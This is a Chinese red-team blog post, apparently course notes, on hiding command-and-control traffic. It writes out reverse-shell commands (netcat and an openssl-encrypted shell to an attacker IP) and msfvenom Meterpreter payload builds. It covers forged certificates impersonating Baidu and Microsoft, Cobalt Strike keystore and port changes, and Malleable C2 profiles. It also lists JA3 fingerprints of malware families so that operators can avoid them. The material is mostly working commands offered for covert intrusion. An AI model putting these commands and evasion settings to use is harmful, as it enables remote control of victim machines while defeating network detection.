EthanDoctor

红队APT-流量隐匿篇&C2工具&加密数据&证书指纹&算法路径&Profiles规则&数据包特征

Ethan医生4周前信息收集52

 红队APT-流量隐匿-C2证书&特征分析

#红队APT-流量隐匿-C2证书&特征分析

1、证书相关:

#NC-未加密&加密后-流量抓包对比

nc -lvvp 5566

nc -e /bin/bash 192.168.1.5 5566

 

在我们的攻击端生成自签名证书

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

在攻击机上监听指定端口,这里我选择8888

openssl s_server -quiet -key key.pem -cert cert.pem -port 5566

在受害机上执行shell反弹命令(注意修改ip和端口)

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.5:5566 > /tmp/s;

 

#MSF-未加密&加密后-流量抓包对比

HTTP数据包特征:

msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.139.131 LPORT=5566 -f exe -o http.exe

HTTPS证书特征:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.139.131 LPORT=5566 -f exe -o https.exe

 

自定义SSL证书:

1.利用openssl生成证书:

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=xiaodi/L=xiaodi/O=Development/CN=www.baidu.com" -keyout www.baidu.com.key -out www.baidu.com.crt && cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem && rm -f www.baidu.com.key www.baidu.com.crt

2.MSF生成绑定证书后门:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.139.131 LPORT=5566 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell HandlerSSLCert=/root/www.baidu.com.pem StagerVerifySSLCert=true -f exe -o https-b.exe

3.MSF监听上线:

use exploit/multi/handler

set payload windows/meterpreter/reverse_https

set lhost 0.0.0.0

set lport 5566

set HandlerSSLCert /root/www.baidu.com.pem

set StagerVerifySSLCert true

run

 

#CS-未加密&加密后-流量抓包对比

HTTP数据包特征:(C2-Profiles

默认UA头

URL路径算法(checksum8)

Post请求路径

.............

public class EchoTest {

public static long checksum8(String text) {

if (text.length() < 4) {

return 0L;

}

text = text.replace("/", "");

long sum = 0L;

for (int x = 0; x < text.length(); x++) {

sum += text.charAt(x);

}

 

return sum % 256L;

}

 

public static void main(String[] args) throws Exception {

System.out.println(checksum8("jquery-3.3.2.slim.min.js"));

}

}

 

 

HTTPS证书特征:

JA3/JA3S(魔改去除)

https://mp.weixin.qq.com/s/pZiP_f7sL2mVC8nIfxtNzg

部分特征:

https://github.com/ByteSecLabs/ja3-ja3s-combo/blob/master/master-list.txt

TrickBOT;(ja3:6734f37431670b3ab4292b8f60f29984 AND ja3s:623de93db17d313345d7ea481e7443cf)

Emotet;(ja3:4d7a28d6f2263ed61de88ca66eb011e3 AND ja3s:80b3a14bccc8598a1f3bbe83e71f735f)

IceD;(ja3:4d7a28d6f2263ed61de88ca66eb011e3 AND ja3s:80b3a14bccc8598a1f3bbe83e71f735f)

Tor;(ja3:e7d705a3286e19ea42f587b344ee6865 AND ja3s:a95ca7eab4d47d051a5cd4fb7b6005dc)

Metasploit;(ja3:72a589da586844d7f0818ce684948eea AND ja3s:70999de61602be74d4b25185843bd18e) OR (ja3:a0e9f5d64349fb13191bc781f81f42e1 AND ja3s:70999de61602be74d4b25185843bd18e)

CobaltStrike;(ja3:72a589da586844d7f0818ce684948eea AND ja3s:b742b407517bac9536a77a7b0fee28e9) OR (ja3:a0e9f5d64349fb13191bc781f81f42e1 AND ja3s:b742b407517bac9536a77a7b0fee28e9)

Empire;(ja3:db42e3017c8b6d160751ef3a04f695e7 AND ja3s:e35df3e00ca4ef31d2b34bebaa2f862)

 

算法解析:

https://github.com/Macr0phag3/ja3box

python ja3box.py -f https.pcap

 

常规特征:

1.修改默认端口:(必需要改)

编辑teamserver文件,更改server port部分50000

2.去除store证书特征:(必需要改)

查看证书指纹:keytool -list -v -keystore cobaltstrike.store

生成证书指纹:keytool -keystore cobaltstrike1.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias xiaodi8.com -dname "CN=xiaodi8 e-Szigno Root CA, OU=e-Szigno CA, O=xiaodi8 Ltd., L=Budapest, S=HU, C=HU"

应用证书指纹:keytool -importkeystore -srckeystore cobaltstrike1.store -destkeystore cobaltstrike1.store -deststoretype pkcs12

3、去除流量通讯特征:

规则资源:

https://github.com/xx0hcd/Malleable-C2-Profiles

https://github.com/FortyNorthSecurity/C2concealer

https://github.com/threatexpress/malleable-c2

https://github.com/zer0yu/Awesome-CobaltStrike?tab=readme-ov-file#0x02-c2-profiles

1.创建C2文件:xiaodi.Profiles

2.写入通讯规则: UA头&GET&POST&心跳&证书等

3.测试规则正常:./c2lint xiaodi.prifile

4.加载C2规则启动:./teamserver ip 密码 xiaodi.Profiles

https-certificate {

set CN "xiaodi8";

set O "Microsoft";

set C "en";

set L "US";

set OU "Microsoft";

set ST "US";

set validity "365";

}

#设置,修改成你的证书名称和证书密码

code-signer{

set keystore "xiaodi.store";

set password "xiaodi";

set alias "xiaodi8.com";

}

 

2、IP和通讯相关:

....................

标签: 红队APT
返回列表

上一篇:红队APT-钓鱼投递篇&近源攻击&BadUSB存储&C2上线&Arduino开发&代码植入&免杀方案

下一篇:红队APT-流量隐匿篇&C2工具&反溯源&隐藏源IP&云函数&CDN节点&数据中转&反向代理

相关文章

红队APT-钓鱼投递篇&邮件系统&SPF绕过&自建SMTP&EwoMail配合Gophish转发&劫持网页

红队APT-钓鱼投递篇&邮件系统&SPF绕过&自建SMTP&EwoMail配合Gophish转发&劫持网页

➢ 红队APT-邮件钓鱼-软硬绕过SPF➢ 红队APT-邮件钓鱼-自建EwoMail➢ 红队APT-邮件钓鱼-Gophish批量域名:xdsec.icu服务器:Cento...

红队APT-钓鱼投递篇&近源攻击&WIFI网络&AP节点创建&数据监控&WiFiPumpkin3项目

➢ 红队APT-近源攻击-WIFI-AP创建和监控#近源攻击-WIFI类https://mp.weixin.qq.com/s/QGGkDQcohM2HsXu_vz6idwWiFi-Pumpk...

红队APT-流量隐匿篇&安全测试&反拉黑&隐藏源IP&隧道代理池&秒切IP访问&绕防护设备

➢ 红队APT-流量隐匿-C2证书&特征分析➢ 红队APT-溯源隐藏-C2通讯&中转节点➢ 红队APT-溯源隐藏-IP通讯&反制拉黑溯源安全态势日...

红队APT-流量隐匿篇&C2工具&反溯源&隐藏源IP&云函数&CDN节点&数据中转&反向代理

➢ 红队APT-流量隐匿-C2证书&特征分析➢ 红队APT-溯源隐藏-C2通讯&中转节点#CDN利用意义:1、用于隐藏上线服务器IP2、节点IP均为厂商上线利用过程...

红队APT-钓鱼投递篇&邮件系统&SPF绕过&自建SMTP&修改转发&Swaks伪造&Gophish平台

红队APT-钓鱼投递篇&邮件系统&SPF绕过&自建SMTP&修改转发&Swaks伪造&Gophish平台

➢ 红队APT-邮件钓鱼-软硬绕过SPF➢ 红队APT-邮件钓鱼-SendCloud转发➢ 红队APT-邮件钓鱼-Gophish批量系统前置内容:钓鱼邮件是指黑客伪装成同...

红队APT-钓鱼投递篇&近源攻击&BadUSB存储&C2上线&Arduino开发&代码植入&免杀方案

➢ 红队APT-近源攻击-BadUSB-上线C2#BADUSB准备工作:1、购买badusb,购买链接:https://detail.tmall.com/item.htm?id=606447...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号